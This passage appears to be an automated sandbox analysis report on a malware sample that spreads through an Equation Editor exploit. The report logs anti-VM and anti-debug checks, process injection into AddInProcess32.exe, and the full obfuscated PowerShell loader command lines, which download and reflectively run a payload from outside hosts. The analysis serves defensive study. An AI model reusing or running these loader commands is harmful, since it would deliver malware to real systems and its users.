                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: powershell.exe, 00000009.00000002.526475419.00000000074EA000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2380000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 450000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598689Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2134Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 409Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1146Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8734Jump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3512Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 3680Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep count: 1146 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep count: 8734 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3884Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep time: -598689s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep time: -2400000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3984Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598689Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                      Source: AddInProcess32.exe, 0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: AddInProcess32.exe, 0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_3-366
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002D5330 CheckRemoteDebuggerPresent,10_2_002D5330
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_03500736 mov edx, dword ptr fs:[00000030h]3_2_03500736
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
                      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.96.3 443Jump to behavior
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs" Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
